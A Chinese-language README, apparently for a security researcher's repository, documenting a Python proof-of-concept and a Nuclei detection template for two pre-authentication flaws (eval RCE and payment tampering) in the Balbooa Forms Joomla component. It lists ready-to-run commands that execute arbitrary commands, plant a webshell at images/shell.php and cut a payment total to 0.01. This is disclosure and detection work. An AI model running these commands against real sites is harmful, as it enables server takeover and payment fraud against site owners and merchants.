
PoC 及检测模板,用于 Balbooa Forms(Joomla)中的预认证 RCE 和支付篡改漏洞,包含 Python 漏洞利用脚本和 Nuclei 检测模板。
针对 Balbooa Forms(com_baforms)Joomla 组件两个预认证漏洞的 PoC 和检测模板,已在 2.4.3.2 版本中修复。
由 Lulztigre 发现,通过 Joomla 安全打击小组(JSST)协调披露,发布于 2026-08-19。完整分析文章:https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html
| 文件 | 用途 |
|---|---|
balbooa_forms_poc.py | Python PoC,仅依赖标准库,覆盖两个 CVE |
CVE-2026-67364.yaml | Nuclei 模板,对 eval RCE 进行非破坏性检测 |
零依赖(Python 3.8+)。rce 和 detect 模式不写入任何文件,也不会触发真实扣款;shell 和 pay 为可选模式,仅限实验室环境使用。
# 1. 查找易受攻击的(form-id, submit-btn)组合。非破坏性:每个探测仅发送一次
# 匿名提交,携带 echo 标记载荷。
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10
# 2. 验证命令执行。输出直接返回在 HTTP 响应中,无持久化。
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id
# 3. 经典 webshell 验证(仅限实验室 - 写入 images/shell.php)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7
# 4. 支付金额篡改(仅限实验室 - 触发真实扣款尝试;需要 --authorize)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01
退出码 0 = 存在漏洞/已利用,1 = 安全或失败,2 = 用法错误。
注意事项:
[URL 参数 = X],且该按钮未启用 reCAPTCHA。--insecure 可跳过对使用自签名证书的 HTTPS 目标的 TLS 验证。仅检测:提取匿名 CSRF 令牌,然后使用 echo 标记载荷扫描小范围的 form/btn 组合,并在响应中匹配标记。不写入任何文件,不触发真实扣款。
nuclei -t CVE-2026-67364.yaml -u http://target -v
已在 nuclei v3.11.1(Windows + Linux)上验证:令牌提取、30 组组合扫描(form-id 1..3 x submit-btn 1..10,clusterbomb)、在易受攻击的组合上命中 1 个 critical 匹配。在离线环境中添加 -duc 可跳过更新检查。扫描范围刻意保持较小;如果目标托管了更多表单,可提高载荷范围。支付篡改(CVE-2026-67363)有意不在 nuclei 中自动化:每次探测都是对商户网关的真实扣款尝试。
仅可对您获得授权测试的系统使用。